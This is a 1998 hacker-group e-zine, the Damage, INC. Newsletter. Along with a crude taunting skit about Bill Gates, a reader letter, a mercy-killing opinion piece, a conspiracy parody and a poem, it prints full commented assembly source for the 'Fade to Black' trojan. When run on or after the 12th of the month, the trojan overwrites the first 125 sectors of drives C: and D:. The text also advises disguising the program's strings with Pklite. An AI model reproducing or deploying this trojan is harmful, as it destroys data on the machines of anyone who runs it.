just wanted to make an honest living. Without my money, I can no longer bully
computer distributors to put Microsoft products in all systems. All I am is a
college drop out!!! I have no skills other than influencing and being greedy
beyond all measure!
<M$L> - Sorry to interrupt you Mr. Geek... errr.. I meant Mr. Gates. We've
been flooded with Email messages, concerning the huge drop in Microsoft stock.
It's almost worthless now, and many stockholders are sending angry, threatening
messages addressed to you. I have been trying to reply to them all in a feeble
attempt to calm them down... and brainwash them into believing that Microsoft's
stock is still "on top". However, I simply can't keep up! It's insane!
They're all panicking and selling as fast as they can... Is this the end of the
world? What should I do? I need help. Please help! Mr. Gates, give me
instructions. I'll be your lackey until the end. You can trust me not to
leave your side... but I don't know what to do. This has *never* happened
before! Who or what could cause this?
<B> - Hahahaha. Damage, INC. is responsible. ;)
<BL> - Hahaha. Our plan is working. Micro$oft will be stopped. Micro$oft
is in panic mode. Soon it'll be done in. I can't wait for its final
destruction... Hehe.
<S> - Haha. This is hilarious. Gates has been crushed under the weight of
his own greed and ego. His head has been cut off, let's enjoy watching him
run around. ;-)
<G> - NO! This can't be the end! Lackey, tell all callers that our systems
are based on Microsoft Windows and they have all crashed! They'll understand,
they all experience it from time to time and keep coming back for more... but
why not now? What am I to do? Without my monopoly and wealth I am nothing!
What has Damage, INC. done to me? I'll give you all anything... EVERYTHING in
order to reverse the destruction of my vision... of the future of the world!
<M$L> - Sir, with all due respect there's nothing that I can do. Your vision
won't help fix this situation. Wake up! Quit dreaming Bill! We're in
serious trouble... What should I do? The Email is still pouring in... and
Microsoft stock is still falling. It looks like the end. I assigned one
hundred lackies to respond to Email... and gave them a list of excuses to
choose from. That'll only hold them off temporarily though. Some of our
previous supporters are rioting and destroying Microsoft HQ. I advise you to
go into the fortified concrete bunker... Your own survival depends upon you
listening to my advice. Sir, please, take shelter before the angry mob
overwhelms us and kills you.
<BL> - Haha! I've been waiting for this day for a long time. I'm just happy
to be a part of Micro$oft's destruction.
<B> - I can just picture you Billy... running for shelter... scrambling for
your very fucking pathetic life. You sicken me. You didn't heed my words
when we last spoke and now you're going to have to pay the price! Hahahaha.
<S> - Yeah Billy, go hide in the shadows once more. You can run, but you
can't hide you pathetic little geek.
<G> - I, er, uhm, (Gates is in panic mode) will get it all back! I will fight
and influence my way back `on top.' Then I'll pay for the best men in the
world to track Damage, INC. down. You guys are dangerous meanies! You have
destroyed the world... a world in which I would be the Big Brother instead of
a small, insignificant loser that I truly am. Lackeys! Sell me out of
Microsoft! Let everyone fend for themselves, for I have no loyalty to anyone
by myself!
<M$L> - Run sir run! Quickly... Quit rambling... and get to the bunker! It's
imperative that you listen. Damage, INC. is just trying to make sure you stay
on the phone until the masses can infiltrate our security and rip you to
shreds. (In a desperate cry) -- Hurry! Let's get out of here. Follow me...
<Damage, INC.> - Hahahahaha! (A collective laugh from Damage, INC. is heard
from great distances).
<BL> - That's right Gates. Run Billy run. Haha. Hide in your bunker. We'll
find you no matter what. You won't have to try to track us down, because we
are gonna hunt you down. :)
<B> - Hahaha. Your fucking lackies will eventually abandon you Billy. Once
they become as greedy as you are, they will stab you in the back. That is,
if Damage, INC. doesn't nuke you first. I will patiently await the day that I
can finally say "Stick a fork in Billy, he's done in." ;) Until then... hide
in your concrete shelter like the pathetic coward that you are. I hope you
cry your eyes out over every penny that you've lost. Start throwing a tantrum
and pout in the corner. I'm shaking my head at you Gates. Think about that
while you're trying to fend off the rats that Damage, INC. infested your filthy
bunker with fucker. Hahaha. <CLICK>.
The message below was written by Fatal Vision on ...AND JUSTICE FOR ALL. I
decided to include it and reply in the Damage, INC. Newsletter so that every
reader is able to read it. This is your forum for feedback, so send us your
Msg # : 153 of 154 Area : Damage, INC. Releases
From : Fatal Vision Date : Fri Dec 26 1997
To : All Time : 1:09 pm
Title : Damage, INC Newsletter
The Damage, INC Newsletter issue # 4 has got to be the best one Damage, INC
has released yet. It could really help newbie's like me learn more and put
there knoledge to practice.. I like and read every article that you guy's
realse. It is funny, and fun to read, and that's what it's all about for me,
I dont like reading boring INFO, the way you guy's present the articles makes
me want to read on, and not leave until I've read the *whole* Newsletter..
Again, I can't say how much your newsletters help the newbies not just in
this area code, but *any* area code out there. I would like to see more
phreaking articles. mabey experiences, tips,wwhat phreaking is all about,
how to make a test phone, or a lineman's handset. What you can do with
bell truck's, houses etc. What you can hope to find in a bell truck, what you
should *look* for in a bell truck etc. This info could be included in an
article. As well, I really enjoyed this month's h/p news and info (Written
By Blackie Lawless) and the VIRUS DETECTION method (Written By Blackened)
The only section that I have not read yet is the CONSPIRACIES AND COVERUPS
section written by Shatazar. But I'll read that some time soon, and get back
to you on what I think about it..
I thought I would give you guy's my opinion in a public base instead of
leaving Blackened Email. As you can all see I am very impressed with Damage,
INC and think they are doing a great job with the newsletter.. I hope all
of you relize Damage, INC. puts *alot* of time into EVERY article, writing,
editing, and producing it. Its not just something that is slapped together
Just to get it done.. Its something that takes alot of thought and time to
produce every month. I also hope you relize that the information in the
DI's newsletter is very informational, and I hope you take the time to read
and leave feedback like i just did.
To Damage, INC - Keep up the excellent work..
your's truely
fatal vision
Editor - Blackie Lawless and I appreciate the feedback man. Why didn't you
read the CONSPIRACIES AND COVERUPS section and comment on it? It
contains some valuable information that could easily affect you.
That article should be of interest to anyone that's involved in h/p.
We're glad that the information we provide is useful to newbies.
As for articles on phreaking, we plan to do that. ;) Blackie Lawless
will probably continue to share his knowledge, tips, experiences etc.
in that area with readers. We do put a lot of time, thought and effort
into every article. Thanks for the compliments and feedback... and
continue to read the Damage, INC. Newsletter man. We hope that you
enjoy this January issue.
Robert Latimer; victim of cowardly inaction.
Robert Latimer was a Saskatchewan farmer that had a 12 year old daughter Tracy,
who suffered from cerebral palsy. In 1993, he placed Tracy in a truck, which he
rigged so that the cab would fill with carbon monoxide. He freed Tracy from a
life of pain and total reliance on others.
I do not believe that Robert Latimer killed Tracy just because she had cerebral
palsy. Tracy Latimer endured a life of suffering and torture. She endured many
operations in vain attempts to alleviate the endless pain. And as she
approached puberty, her already twisted body would have encountered rapid
growth. Her agony would have increased dramatically. Robert Latimer could no
longer stand by as his daughter struggled through each day. I would have done
the same thing if I was standing in his shoes.
Latimer was arrested in November 1993 and was charged with first degree murder
(In Canada, maximum punishment is life with no chance of parole for 25 years).
He was convicted on November 16, 1994. The Saskatchewan Court of Appeal upheld
the conviction on July 18, 1995.
The case went to the Supreme Court of Canada. On February 6, 1997, the judges
overturned the conviction, because the crown lawyers questioned potential jurors
about their views on religion, abortion and mercy killing. In other words,
crown prosecutors tampered with the jury. The court ordered a retrial.
During the second trial, the jury found Latimer guilty of second degree murder.
However, when the jury found out the minimum sentence (10 years) they could
issue, some were appalled. They felt that such a sentence was to harsh, and
recommended a minimum sentence of one year. Justice Ted Noble agreed with the
In early December 1997, Robert Latimer was sentenced to one year in jail plus
one year house arrest on his Saskatchewan farm. In handing out this sentence,
Noble used the Charter of Rights of Freedom to Latimer's benefit. He ruled that
to sentence him to a minimum of 10 years for a "homicide that was committed for
caring and altruistic reasons" would be cruel and unreasonable punishment.
However, he also said that a jail term is needed to deter others from committing
a similar crime. In other words, Latimer is being made an example out of, just
like a vicious criminal. Since Noble's decision is unprecedented, an appeal by
the crown would not be surprising. And so the neverending process called the
"justice" system will keep on going.
Because of this controversial decision, the media has initiated extensive
discussions and debates. As always, citizens have picked up on that, so now the
recent sentencing of Robert Latimer is currently a hot topic.
Special interest groups are coming out of the woodwork. There are those that
claim to support the disabled, others that believe in mercy killing. There
are Javert (cop in Les Miserables) clones that feel that the stated punishment
in the law is paramount, and that circumstances are irrelevant. While others
(albeit not many) actually believe in fairness and justice. I've had a few good
laughs (and stomach churnings) watching zombies squirm when TV beat reporters
walked up to them and asked for their opinion on the Latimer case.
However, I've learned that an enlightened person will step away from the narrow
scope of the public debate over this issue and look at the big picture. I ask
you who wasn't mentioned above? Who is too cowardly to deal with the issue of
mercy killing? The answer is the group of corrupt, self-serving people that are
responsible for the confusion. The Government of Canada.
The leaders of "society" bears a huge amount of responsibility for this whole
ordeal. They label important issues like mercy killing as "political suicide."
They are too cowardly to do anything about it. It is because of their inaction
that Robert Latimer was branded a "murderer" when he ended his daughter's
terrible suffering. It is because of their inaction that Robert Latimer has
lost his livelihood, his savings, and most importantly his freedom.
The consequences of the government's inaction are broad. If the bastards in
Ottawa are too scared to deal with the issue, why don't they allow the decision
to be made by the suffering person and his or her family? That would be a
logical step, but remember we don't live in a democracy. It is repulsive to
know that the government has so much control that a suicide attempt is
considered to be a criminal act. :( Instead, the government has left it up to
the "justice" system to decide Canada's policy on mercy killing. Obviously, all
that judges can base their decisions on are laws like the Criminal Code.
Therefore, mercy killers are considered murderers by default.
Is that fair or just? "Society" doesn't like it too much when "people take the
law into their own hands." On the other hand, the government doesn't have *any*
statement or opinion on the matter. Because of the gross misconduct of the
government, women are allowed to kill their unborn babies, yet choosing to
assist a loved one end his or her life can put you in prison from 10 years to
Unfortunately, mercy killing and the Robert Latimer case is only one example
of how spineless and hypocritical the government is. They are not an innocent
party just because they refused to act. In my opinion, if Robert Latimer is a
murderer, then the government is a liable accomplice. They can't have it both
Written by Shatazar <20> Damage, INC. (C)opyright 1998.
By No. 405-33-1231
1. WATCH LOTS OF TELEVISION. Television pleasantly sublimates the primitive
human defense mechanism that can get you in trouble.
2 AVOID TALKING ABOUT RELIGION OR POLITICS. No matter how innocuous your
speech may be, it could be misinterpreted and recorded in your Government
Personal Thought Dossier.
Family name may be perceived as prideful individualism.......a Class B
ENROLLED IN RE-EDUCATION CENTERS. NWO Rules of Justice provide for
expeditious prosecution and conviction of Guilt by Association.
carefully monitored by Elections Security Police (ESP) to identify
potential dissidents and enemies of the World. Avoid voting for mavericks
----most of whom are sponsored and financed by the World Government
Opportunities Agency (WGOA) to bring malcontents out into the open. To
assure minimal risk when voting, cast your ballot for incumbents having
an A-1 rating by the ADL.
AREA. To obtain additional merit points, carry a sign which derides
viewpoints held by Constitutionalists, Patriot Groups, Fundamentalist
Christians and other bigots.
Reiterate them as if they were your own during all social and business
8. ATHEISM IS THE SAFEST POLICY. But affiliations with State-Approved
religious organizations are permitted, and may be rich fields for
business contacts.
when the UNIVERSAL PLOWSHARES ACT goes into effect. You will be well-fed
PROGRAM, hunting will be unnecessary, and possession of firearms of any
description after the effective date of UPA will constitute the capitol
offense of Aggravated Intent to Commit Homicide.
enthusiastically in the new OBE school program and realize the honor
associated with being a breeder and care taker of the first generation
- If you find any interesting articles, or you've written one, send it in. If
it's quality, we'll publish it. ;)
The Fade to Black Trojan is featured this month in the spotlight. The assembly
source code is fully commented and should be fairly easy to understand. You
can modify the text strings, ansi screen etc. In fact, you must change them
if you want to use the trojan. This is basically how the trojan works. After
FTB.EXE is executed, it checks the date. Then it compares the day to 12. If
it's below the 12th of the month (1-11), it displays the ansi screen, final
message and exits to DOS. If it's the 12th of the month or higher, it will
activate. Upon activation, Fade to Black nukes Drive C: and D: if it exists.
Next, the tweeter beeps 5 times. You can change the number of drives and beeps
if you want. Lastly, the ansi screen is displayed. ANSI.SYS is not required
for ansi support. So, no matter what day it is executed on the ansi screen and
final message are displayed. The difference is if you run FTB.EXE on the 12th
of any month or later, it'll activate and do damage. I'm including the source
code so that you can read it and learn. It isn't intended to be used to nuke
people. I wrote it to teach people some assembly techniques (loops, displaying
an ansi screen, jumps, compares, using counters etc.) If people abuse it, then
I won't include any trojans in the Damage, INC. Newsletter again. You can test
this trojan safely by changing your system date, so that the day is less than
but not equal to 12. In other words, the day of the month must be 1-11 so that
it won't activate and nuke you. This trojan has been tested extensively on
several systems and only activates when the day is 12 or greater.
Disclaimer: If you assemble and nuke yourself with this trojan, it is your own
fault. You've been warned about what it does and the source code is commented.
You are responsible, not Damage, INC.
;[Fade to Black Trojan] (C) 1998 by BLACKENED <20> Damage, INC.
;Use Pklite -e FTB.EXE to make the trojan smaller and hide the text strings.
DAM_LENGTH EQU 4000 ;Size of the ANSI
.MODEL small ;We are a very small trojan
.STACK 100h ;256 byte stack
;Below is the final message that is displayed.
Message DB '[0;1;30mCourtesy of Damage, INC.[0m',13,10,'$'
;Below is the message that's written to the hard drives.
Damage DB 'The damage has been done. Fade to Black.',13,10
DB 'You nuked yourself. This hard drive is done in.',13,10
DB 'Now you can smile and fucking grin.',13,10
;Data storage area that holds the ansi screen that was saved in
;TheDraw's asm format. The ansi included is just an example. You
;must modify or replace it before using this trojan.
DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'<27>',1,'<27>',1,'<27>',1
DB '<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1
DB '<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,' ',8,' ',8,' ',8,'<27>',1
DB '<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1
DB '<27>',1,'<27>',1,'<27>',1,' ',8,' ',8,' ',8,'<27>',1,'<27>',1,'<27>',1
DB '<27>',1,'<27>',1,'<27>',1,'<27>',1,' ',8,'<27>',1,'<27>',1,'<27>',1,'<27>',1
DB '<27>',1,'<27>',1,'<27>',1,' ',8,' ',8,' ',8,'<27>',1,'<27>',1,'<27>',1
DB '<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,'<27>',1,' ',8
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;The actual code starts below.
mov ah,2ah ;Get current Date
int 21h ;DOS Call
cmp dl,12 ;Check current Day
jb damstart ;Jump if Below 12th of the month.
cli ;Clear (disable) interrupts
mov ah,3 ;BIOS Write Sectors
mov al,125 ;Number of sectors to nuke.
mov ch,0 ;Cylinder number
mov cl,1 ;Starting sector
mov dh,0 ;Head number
mov dl,80h ;Drive C:
mov bx,offset damage ;Pointer to data buffer
int 13h ;Call Interrupt 13
mov ah,3 ;BIOS Write Sectors
mov al,125 ;Number of sectors to nuke.
mov ch,0 ;Cylinder number
mov cl,1 ;Starting sector
mov dh,0 ;Head number
mov dl,81h ;Drive D:
mov bx,offset damage ;Point to data buffer
int 13h ;Call Interrupt 13
sti ;Enable interrupts
mov cx,5 ;Number of beeps = 5
mov ax,0E07h ;BIOS display char., BEL
int 10h ;Using int 10,0E
loop beep_loop ;Beep until CX = 0
;Set up DS, SS and SP Registers.
mov dx,@data ;Move data into dx
mov ds,dx ;Move dx into ds
mov bx,ss ;Move ss into bx
sub bx,dx ;Subtract dx from bx
shl bx,1 ;Shift bx logical left by 1
shl bx,1 ;Shift again
shl bx,1 ;and again.
shl bx,1 ;<SH> and Laughing! Haha.
cli ;Clear interrupts
mov ss,dx ;Move dx into ss
add sp,bx ;Add bx to sp and store in sp
sti ;Enable interrupts
push es ;Push ES register to save it
mov ax,0B800h ;Color text video segment
mov es,ax ;Move ax into es
sub si,si ;Subtract SI from SI
mov si,offset DAM_DATA ;Pointer to the Data (ansi screen)
sub di,di ;Subtract DI from DI and you get DI.
mov cx,DAM_LENGTH ;CX is size of the screen
rep movsw ;Repeat move string word. Write to
;video memory.
mov ah,02h ;Set cursor position
mov bh,0 ;Video page 0
mov dx,1A00h ;Move cursor past bottom of screen
int 10h ;Hides the cursor
lup: mov ah,01h ;Get keyboard status
int 16h ;Are any keys being pressed?
jz lup ;Jump if zero. A simple loop.
mov ah,0 ;Waits for keypress and reads the
int 16h ;character using int 16,0
;Clears the screen
mov ah,7 ;Scroll down a window
mov al,0 ;Blank entire screen
mov bh,7 ;Attribute to use on blank line
mov ch,0 ;Row of upper left corner = 0
mov cl,0 ;Column of upper left corner = 0
mov dh,25 ;Row of lower right = 25
mov dl,80 ;Column of lower right = 80
int 10h ;Clears entire 80x25 screen.
mov ah,02h ;Sets cursor position
mov bh,0 ;Video page 0
mov dx,0 ;Puts the cursor back at the top.
int 10h ;Call Interrupt 10
pop es ;Restore ES register
mov ax,@data ;Move the data into ax
mov ds,ax ;Move ax into ds
mov ah,9 ;Print string function
mov dx,offset Message ;Pointer to the message
int 21h ;Call DOS to execute
mov ax,4c00h ;DOS exit function w/exitcode = 0
int 21h
END start ;The end.
"Visions in Fire"
I live in the chaos and madness. I've learned to embrace my own insanity.
The world now mutates around me like molten lava flowing in a river of fire.
It cascades down the volcano and towards the ocean. Once it reaches those cool
waters it is transformed back into solid rock. The process is amazing and
visually stunning, but not nearly as important as the result, which is creation
itself. Being able to view the abstract, unique shapes as they form underneath
the surface of the waves, that are forever crashing into the jagged cliffs along
the expansive shoreline is an experience that makes a lasting impression.
However, living on the inside and looking out at everyone else is an even
greater one. Imagine the sight of people around you behaving like ants in a
colony. They exist, but they are trapped. The ants are controlled, mindless,
insignificant workers that live to serve their queen and "society". Their
world is a controlled one in which every little ant has their own tasks and
duties to perform. The ants do communicate with each other. It's usually
limited and mainly used for instructions that are work or food related. The
level of interaction between them might seem highly advanced, but in reality
it is just an elaborate illusion. The ants might seem like individual insects
at times, yet they cannot survive by themselves outside of the colony. They
completely rely on each other. It is not natural or normal for people to live
in the same way as ants. Human beings shouldn't behave like insects.
I was filled with hate. The hate was powerful and it nearly consumed me.
Learning the cause of the hate was difficult. Accepting the reason for my
hate was challenging. Denouncing and leaving the confines of "society" was
actually easy. The change that it made was dramatic. Sometimes drastic
changes are necessary for ones survival. Positive change can lift your
spirit and take you into a new direction. The experiences gained from that
can be rewarding and fulfilling. The most immediate consequence of a life-
altering change is the expansion of your consciousness. You cannot make the
change knowing what the results will be. It's like seeing visions in fire.
The visions may give you insight into the future or they may be false and
misleading images. They can be deep and profound or shallow and fake. You
become enlightened when you realize that you aren't just another ant in the
colony. Discover your purpose. Find the individualism that you lost. Don't
be fooled by the messages that you are told to believe. Truth is concealed.
Lies are blatant. If you search you can uncover the hidden meaning. Abandon
the ants in the colony. Trust your own vision.
Written by Blackie Lawless <20> Damage, INC. (C)opyright 1998.
BLACKENED's Humble Closing Comments:
Damage, INC. is committed to releasing quality issues of the Damage, INC.
Newsletter in 1998. As you already know, it's a new year. We want to start
off this year by doing unique, innovative, original and creative projects.
The articles that were included in this January issue should demonstrate that
to you, and reflect our main goal. That is, we always strive for excellence.
In 1998, I want to spend more time programming and releasing Damage, INC.
Utilities. There are a few unfinished projects that I'd like to complete.
I also plan to work on Trixter! (the bbs software that I use with my board)
now that I have the source code. ;) Other than those projects, I would like
to "tutor" some h/p newbies... Plus, I'm going to reserve some time for myself
so that I don't lag behind in the h/p scene.
On another note, we have many interesting ideas and topics in mind for future
issues of the Damage, INC. Newsletter. We're going to write more about the
paranormal, millennium, drugs etc. and share our opinions. If you have any
suggestions, contact us. For example, should we continue to include source
code? If so, should it be commented source for utilities, trojans or viruses?
What type of articles do you enjoy reading? What are the topics that interest
or affect you the most?
We're always looking for Writers, Members and Distribution Sites. If you'd like
to apply to Damage, INC. and join a respected h/p group, then download a copy of
the Damage, INC. Application Generator. If you want any of our releases, they
are currently available on the following boards:
...AND JUSTICE FOR ALL - Damage, INC. WHQ, h/p/a/c/v/t, no ratios, invite only.
Freedom of Information Archives - Damage, INC. Dist. Site, h/p/a/c/v/t.
Distraught Continuum - h/p/a/c/v/t, programming, etc.
Any feedback or letters to the editor should be sent to BLACKENED in Email on
a Damage, INC. board near you. I can also be contacted via Echomail/Netmail
in several nets.